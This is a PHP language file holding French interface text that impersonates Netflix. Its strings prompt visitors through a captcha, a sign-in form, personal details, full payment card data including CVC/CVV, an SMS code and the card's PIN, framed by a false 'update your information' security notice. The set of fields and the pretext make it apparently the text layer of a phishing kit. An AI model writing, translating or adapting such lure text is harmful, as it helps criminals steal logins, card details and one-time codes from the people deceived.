<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "fr",
        "xcapt" => "Veuillez prendre un moment pour résoudre le hCaptcha ci-dessous. Cela nous aide à nous assurer que vous êtes un utilisateur authentique et non un bot, fournissant un environnement sécurisé pour tous.",
        "xcapt1" => "Veuillez cocher la case CAPTCHA.",
        "xcapt2" => "Vérification",
        "xcapt3" => "Continuer",
        "xmain1" => "S'identifier",
        "xmain2" => "Adresse e-mail ou numéro de téléphone",
        "xmain3" => "Veuillez entrer une adresse e-mail ou un numéro de téléphone valide.",
        "xmain4" => "Mot de passe",
        "xmain5" => "Votre mot de passe doit contenir entre 4 et 60 caractères.",
        "xmain6" => "S'identifier",
        "xmain7" => "Se souvenir de moi",
        "xmain8" => "Besoin d'aide ?",
        "xmain9" => "Nouveau sur Netflix ?",
        "xmain10" => " Inscrivez-vous maintenant.",
        "xmain11" => "Cette page est protégée par Google reCAPTCHA pour s'assurer que vous n'êtes pas un robot.",
        "xmain12" => "En savoir plus.",
        "xinfoz1" => "Informations personnelles",
        "xinfoz2" => "Nom et prénom",
        "xinfoz3" => "Ce champ est obligatoire.",
        "xinfoz4" => "Date de naissance",
        "xinfoz5" => "Adresse",
        "xinfoz6" => "Ville",
        "xinfoz7" => "Code postal",
        "xinfoz8" => "Adresse e-mail",
        "xinfoz9" => "Numéro de téléphone",
        "xinfoz10" => "Les champs dans ce formulaire sont obligatoires car nous avons besoin de ces informations pour traiter votre demande.",
        "xinfoz11" => "Continuer",
        "xpay1" => "Configurer votre carte de paiement",
        "xpay2" => "Numéro de carte",
        "xpay3" => "Numéro de carte obligatoire.",
        "xpay4" => "Date d'expiration",
        "xpay5" => "Date d'expiration obligatoire.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV obligatoire.",
        "xpay8" => "Chiffré de bout en bout",
        "xpay9" => "Continuer",
        "xsms1" => "Vérification",
        "xsms2" => "Pour votre sécurité, nous devons nous assurer qu'il s'agit bien de vous.",
        "xsms3" => "Nous vous enverrons un SMS avec un code de sécurité",
        "xsms4" => "Veuillez saisir le code reçu",
        "xsms5" => "Code SMS",
        "xsms6" => "Code SMS invalide",
        "xsms7" => "Cette étape est nécessaire pour effectuer votre demande en toute sécurité.",
        "xsms8" => "Continuer",
        "xpin1" => "Vérification",
        "xpin2" => "Pour votre sécurité, nous devons nous assurer qu'il s'agit bien de vous.",
        "xpin3" => "Nous vous enverrons un SMS avec un code de sécurité",
        "xpin4" => "Veuillez saisir le code pin de votre carte",
        "xpin5" => "Code PIN",
        "xpin6" => "Code PIN invalide",
        "xpin7" => "Cette étape est nécessaire pour effectuer votre demande en toute sécurité.",
        "xpin8" => "Continuer",
        "xexpl1" => "Mise à jour",
        "xexpl2" => "Nous espérons que cette communication vous trouve bien. Nous tenons à vous informer qu'il est essentiel de mettre à jour vos informations sur notre plateforme afin de garantir une expérience utilisateur continue et sécurisée.",
        "xexpl3" => "Pour améliorer nos services et assurer la sécurité de votre compte, veuillez prendre quelques instants pour mettre à jour vos informations.",
        "xexpl4" => "Continuer",
        "xconf1" => "Confirmation",
        "xconf2" => "Nous vous remercions sincèrement d'avoir pris le temps de mettre à jour vos informations sur notre plateforme. Votre engagement envers la sécurité et l'exactitude des détails de votre compte est essentiel pour nous.",
        "xconf3" => "Vos modifications ont été enregistrées avec succès. Vous pouvez désormais profiter pleinement de notre plateforme avec les informations les plus récentes et à jour.",
        "xconf4" => "Continuer",
        "xload1" => "Traitement en cours...",
        "xload2" => "Ne quittez pas cette page.",
        "xfoot1" => "Des questions ? Contactez-nous.",
        "xfoot2" => "FAQ",
        "xfoot3" => "Centre d'aide",
        "xfoot4" => "Conditions d'utilisation",
        "xfoot5" => "Confidentialité",
        "xfoot6" => "Préférences de cookies",
        "xfoot7" => "Informations d'entreprise",
        "xfoot8" => "Français"
    );

    return $lang[$phrase];
}
?>
